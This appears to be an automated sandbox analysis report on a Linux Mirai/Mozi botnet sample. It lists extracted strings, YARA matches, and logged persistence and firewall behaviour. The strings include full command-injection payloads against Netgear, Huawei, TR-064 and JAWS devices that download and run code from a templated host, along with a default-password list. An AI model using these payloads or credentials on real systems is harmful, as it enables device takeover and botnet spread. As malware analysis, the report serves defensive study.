2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 30 35 20 44 65 63 20 32 30 32 34 20 32 33 3a 33 39 3a 32 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74
                            Source: networks.14.drString found in binary or memory: http://%s:%d/Mozi.a;chmod
                            Source: bin.sh.elf, networks.14.drString found in binary or memory: http://%s:%d/Mozi.a;sh$
                            Source: networks.14.drString found in binary or memory: http://%s:%d/Mozi.m
                            Source: bin.sh.elf, networks.14.drString found in binary or memory: http://%s:%d/Mozi.m;
                            Source: bin.sh.elf, networks.14.drString found in binary or memory: http://%s:%d/Mozi.m;$
                            Source: bin.sh.elf, networks.14.drString found in binary or memory: http://%s:%d/Mozi.m;/tmp/Mozi.m
                            Source: networks.14.drString found in binary or memory: http://%s:%d/bin.sh
                            Source: bin.sh.elf, networks.14.drString found in binary or memory: http://%s:%d/bin.sh;chmod
                            Source: networks.14.drString found in binary or memory: http://127.0.0.1
                            Source: bin.sh.elf, networks.14.drString found in binary or memory: http://127.0.0.1sendcmd
                            Source: bin.sh.elf, networks.14.drString found in binary or memory: http://HTTP/1.1
                            Source: bin.sh.elf, networks.14.drString found in binary or memory: http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
                            Source: kmod.sh.14.drString found in binary or memory: http://git.kernel.org/cgit/utils/kernel/kmod/kmod.git/commit/libkmod/libkmod-module.c?id=fd44a98ae2e
                            Source: .config.14.drString found in binary or memory: http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
                            Source: networks.14.drString found in binary or memory: http://ipinfo.io/ip
                            Source: alsa-info.sh.14.drString found in binary or memory: http://pastebin.ca)
                            Source: alsa-info.sh.14.drString found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
                            Source: alsa-info.sh.14.drString found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
                            Source: bin.sh.elf, networks.14.drString found in binary or memory: http://purenetworks.com/HNAP1/
                            Source: networks.14.drString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                            Source: networks.14.drString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                            Source: bin.sh.elf, networks.14.drString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
                            Source: alsa-info.sh.14.drString found in binary or memory: http://www.alsa-project.org
                            Source: alsa-info.sh.14.drString found in binary or memory: http://www.alsa-project.org.
                            Source: alsa-info.sh.14.drString found in binary or memory: http://www.alsa-project.org/alsa-info.sh
                            Source: alsa-info.sh.14.drString found in binary or memory: http://www.alsa-project.org/cardinfo-db/
                            Source: alsa-info.sh.14.drString found in binary or memory: http://www.pastebin.ca
                            Source: alsa-info.sh.14.drString found in binary or memory: http://www.pastebin.ca.
                            Source: alsa-info.sh.14.drString found in binary or memory: http://www.pastebin.ca/upload.php
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
                            Source: /tmp/bin.sh.elf (PID: 6241)HTML file containing JavaScript created: /usr/networksJump to dropped file

                            System Summary

                            barindex
                            Source: bin.sh.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_5c62e6b2 Author: unknown
                            Source: bin.sh.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_77137320 Author: unknown
                            Source: bin.sh.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_ac253e4f Author: unknown
                            Source: 6237.1.00007f42f0017000.00007f42f0058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5c62e6b2 Author: unknown
                            Source: 6237.1.00007f42f0017000.00007f42f0058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_77137320 Author: unknown
                            Source: 6237.1.00007f42f0017000.00007f42f0058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_ac253e4f Author: unknown
                            Source: 6239.1.00007f42f0017000.00007f42f0058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5c62e6b2 Author: unknown
                            Source: 6239.1.00007f42f0017000.00007f42f0058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_77137320 Author: unknown
                            Source: 6239.1.00007f42f0017000.00007f42f0058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_ac253e4f Author: unknown
                            Source: /usr/networks, type: DROPPEDMatched rule: Linux_Trojan_Mirai_5c62e6b2 Author: unknown
                            Source: /usr/networks, type: DROPPEDMatched rule: Linux_Trojan_Mirai_77137320 Author: unknown
                            Source: /usr/networks, type: DROPPEDMatched rule: Linux_Trojan_Mirai_ac253e4f Author: unknown
                            Source: Initial sampleString containing 'busybox' found: busybox
                            Source: Initial sampleString containing 'busybox' found: ..%s/%s/proc/haha/tmp/var/lib/dev/syscfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL "http://127.0.0.1"cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword "acsMozi"iptables -I INPUT -p tcp --destination-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 7547 -j DROPiptables -I OUTPUT -p tcp --source-port 7547 -j DROPiptables -I INPUT -p tcp --dport 35000 -j DROPiptables -I INPUT -p tcp --dport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 35000 -j DROPiptables -I INPUT -p tcp --dport 7547 -j DROPiptables -I OUTPUT -p tcp --sport 7547 -j DROP/mnt/jffs2/Equip.sh%s%s%s%s#!/bin/sh/mnt/jffs2/wifi.sh/mnt/jffs2/WifiPerformance.shbusybox%255s %255s %255s %255s
                            Source: Initial sampleString containing 'busybox' found: /bin/busybox cat /bin/ls|head -n 1
                            Source: Initial sampleString containing 'busybox' found: /bin/busybox hexdump -e '16/1 "%c"' -n 52 /bin/ls
                            Source: Initial sampleString containing 'busybox' found: /bin/busybox cat /bin/ls|more
                            Source: Initial sampleString containing 'busybox' found: "\x%02xsage:/bin/busybox cat /bin/ls|head -n 1
                            Source: Initial sampleString containing 'busybox' found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
                            Source: Initial sampleString containing 'busybox' found: /bin/busybox dd bs=52 count=1 if=/bin/ls || /bin/busybox cat /bin/ls || while read i; do printf $i; done < /bin/ls || while read i; do printf $i; done < /bin/busybox
                            Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)
                            Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
                            Source: Initial sampleString containing 'busybox' found: /bin/busybox echo '%s' %s .i; %s && /bin/busybox echo '%s'
                            Source: Initial sampleString containing 'busybox' found: ./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
                            Source: Initial sampleString containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
                            Source: Initial sampleString containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
                            Source: Initial sampleString containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '%s'
                            Source: Initial sampleString containing 'busybox' found: /bin/busybox wget;/bin/busybox echo -ne '%s'
                            Source: Initial sampleString containing 'busybox' found: ELF.r.c.x.k.p.s.6.m.l.4>>/bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)>.x/bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
                            Source: Initial sampleString containing 'busybox' found: me./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
                            Source: Initial sampleString containing 'busybox' found: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
                            Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s:%d -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: Initial sampleString containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
                            Source: Initial sampleString containing potential weak password found: admin
                            Source: Initial sampleString containing potential weak password found: default
                            Source: Initial sampleString containing potential weak password found: support
                            Source: Initial sampleString containing potential weak password found: service
                            Source: Initial sampleString containing potential weak password found: supervisor
                            Source: Initial sampleString containing potential weak password found: guest
                            Source: Initial sampleString containing potential weak password found: administrator
                            Source: Initial sampleString containing potential weak password found: 123456
                            Source: Initial sampleString containing potential weak password found: 54321
                            Source: Initial sampleString containing potential weak password found: password
                            Source: Initial sampleString containing potential weak password found: 12345
                            Source: Initial sampleString containing potential weak password found: admin1234
                            Source: Initial samplePotential command found: GET /c HTTP/1.0
                            Source: Initial samplePotential command found: GET %s HTTP/1.1
                            Source: Initial samplePotential command found: GET /c
                            Source: Initial samplePotential command found: GET /Mozi.6 HTTP/1.0
                            Source: Initial samplePotential command found: GET /Mozi.7 HTTP/1.0
                            Source: Initial samplePotential command found: GET /Mozi.c HTTP/1.0
                            Source: Initial samplePotential command found: GET /Mozi.m HTTP/1.0
                            Source: Initial samplePotential command found: GET /Mozi.x HTTP/1.0
                            Source: Initial samplePotential command found: GET /Mozi.a HTTP/1.0
                            Source: Initial samplePotential command found: GET /Mozi.s HTTP/1.0
                            Source: Initial samplePotential command found: GET /Mozi.r HTTP/1.0
                            Source: Initial samplePotential command found: GET /Mozi.b HTTP/1.0
                            Source: Initial samplePotential command found: GET /Mozi.4 HTTP/1.0
                            Source: Initial samplePotential command found: GET /Mozi.k HTTP/1.0
                            Source: Initial samplePotential command found: GET /Mozi.l HTTP/1.0
                            Source: Initial samplePotential command found: GET /Mozi.p HTTP/1.0
                            Source: Initial samplePotential command found: GET /%s HTTP/1.1
                            Source: Initial samplePotential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: Initial samplePotential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://%s:%d/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: Initial samplePotential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                            Source: Initial samplePotential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s:%d/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m
                            Source: Initial samplePotential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron
                            Source: ELF static info symbol of initial sample.symtab present: no
                            Source: bin.sh.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_5c62e6b2 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 39501003c45c89d6a08f71fbf9c442bcc952afc5f1a1eb7b5af2d4b7633698a8, id = 5c62e6b2-9f6a-4c6d-b3fc-c6cbc8cf0b4b, last_modified = 2021-09-16
                            Source: bin.sh.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_77137320 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = afeedf7fb287320c70a2889f43bc36a3047528204e1de45c4ac07898187d136b, id = 77137320-6c7e-4bb8-81a4-bd422049c309, last_modified = 2021-09-16
                            Source: bin.sh.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_ac253e4f reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = e2eee1f72b8c2dbf68e57b721c481a5cd85296e844059decc3548e7a6dc28fea, id = ac253e4f-b628-4dd0-91f1-f19099286992, last_modified = 2021-09-16
                            Source: 6237.1.00007f42f0017000.00007f42f0058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5c62e6b2 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 39501003c45c89d6a08f71fbf9c442bcc952afc5f1a1eb7b5af2d4b7633698a8, id = 5c62e6b2-9f6a-4c6d-b3fc-c6cbc8cf0b4b, last_modified = 2021-09-16
                            Source: 6237.1.00007f42f0017000.00007f42f0058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_77137320 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = afeedf7fb287320c70a2889f43bc36a3047528204e1de45c4ac07898187d136b, id = 77137320-6c7e-4bb8-81a4-bd422049c309, last_modified = 2021-09-16
                            Source: 6237.1.00007f42f0017000.00007f42f0058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_ac253e4f reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = e2eee1f72b8c2dbf68e57b721c481a5cd85296e844059decc3548e7a6dc28fea, id = ac253e4f-b628-4dd0-91f1-f19099286992, last_modified = 2021-09-16
                            Source: 6239.1.00007f42f0017000.00007f42f0058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5c62e6b2 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 39501003c45c89d6a08f71fbf9c442bcc952afc5f1a1eb7b5af2d4b7633698a8, id = 5c62e6b2-9f6a-4c6d-b3fc-c6cbc8cf0b4b, last_modified = 2021-09-16
                            Source: 6239.1.00007f42f0017000.00007f42f0058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_77137320 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = afeedf7fb287320c70a2889f43bc36a3047528204e1de45c4ac07898187d136b, id = 77137320-6c7e-4bb8-81a4-bd422049c309, last_modified = 2021-09-16
                            Source: 6239.1.00007f42f0017000.00007f42f0058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_ac253e4f reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = e2eee1f72b8c2dbf68e57b721c481a5cd85296e844059decc3548e7a6dc28fea, id = ac253e4f-b628-4dd0-91f1-f19099286992, last_modified = 2021-09-16
                            Source: /usr/networks, type: DROPPEDMatched rule: Linux_Trojan_Mirai_5c62e6b2 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 39501003c45c89d6a08f71fbf9c442bcc952afc5f1a1eb7b5af2d4b7633698a8, id = 5c62e6b2-9f6a-4c6d-b3fc-c6cbc8cf0b4b, last_modified = 2021-09-16
                            Source: /usr/networks, type: DROPPEDMatched rule: Linux_Trojan_Mirai_77137320 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = afeedf7fb287320c70a2889f43bc36a3047528204e1de45c4ac07898187d136b, id = 77137320-6c7e-4bb8-81a4-bd422049c309, last_modified = 2021-09-16
                            Source: /usr/networks, type: DROPPEDMatched rule: Linux_Trojan_Mirai_ac253e4f reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = e2eee1f72b8c2dbf68e57b721c481a5cd85296e844059decc3548e7a6dc28fea, id = ac253e4f-b628-4dd0-91f1-f19099286992, last_modified = 2021-09-16
                            Source: classification engineClassification label: mal100.spre.troj.evad.linELF@0/486@73/0

                            Persistence and Installation Behavior

                            barindex
                            Source: /bin/sh (PID: 6273)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 49999 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6280)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 49999 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6283)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 49999 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6287)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 49999 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6290)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 49999 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6293)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 49999 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6302)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 49999 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6308)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 49999 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6315)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6318)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6324)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6350)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6366)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6374)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6380)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6386)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6392)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6398)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6404)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6410)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6416)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6422)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6428)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6434)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6443)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p udp --destination-port 1027 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6448)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p udp --source-port 1027 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6454)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 1027 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6457)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 1027 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6460)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p udp --dport 1027 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6463)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p udp --sport 1027 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6469)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 1027 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6475)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 1027 -j ACCEPTJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6241)File: /proc/6241/mountsJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6241)File: /etc/profile.d/cedilla-portuguese.shJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6241)File: /etc/profile.d/im-config_wayland.shJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6241)File: /etc/profile.d/gawk.shJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6241)File: /etc/profile.d/01-locale-fix.shJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6241)File: /etc/profile.d/apps-bin-path.shJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6241)File: /etc/profile.d/Z99-cloudinit-warnings.shJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6241)File: /etc/profile.d/vte-2.91.shJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6241)File: /etc/profile.d/Z97-byobu.shJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6241)File: /etc/profile.d/Z99-cloud-locale-test.shJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6241)File: /etc/profile.d/xdg_dirs_desktop_session.shJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6241)File: /etc/profile.d/bash_completion.shJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6241)File: /etc/rcS.d/S95baby.shJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6241)File: /etc/rcS.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6241)File: /etc/init.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)Jump to behavior
                            Source: /bin/sh (PID: 6250)Killall command executed: killall -9 telnetd utelnetd scfgmgrJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6237)File: /tmp/.ipsJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6241)Directory: //run/speech-dispatcher/.cacheJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6241)Directory: //home/saturnino/.mozillaJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6241)Directory: //home/saturnino/.cacheJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6241)Directory: //home/saturnino/.gnupgJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6241)Directory: //home/saturnino/.configJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6241)Directory: //home/saturnino/.localJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6241)Directory: //etc/.javaJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6241)Directory: //etc/.java/.systemPrefsJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6241)Directory: //etc/skel/.configJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6251)Directory: /tmp/.configJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6259)Directory: /tmp/.configJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6263)Directory: /tmp/.ipsJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6263)Directory: /tmp/.configJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6269)Directory: /tmp/.configJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6237)Empty hidden file: /tmp/.ipsJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/1582/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/3088/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/230/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/110/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/231/statJump to behavior
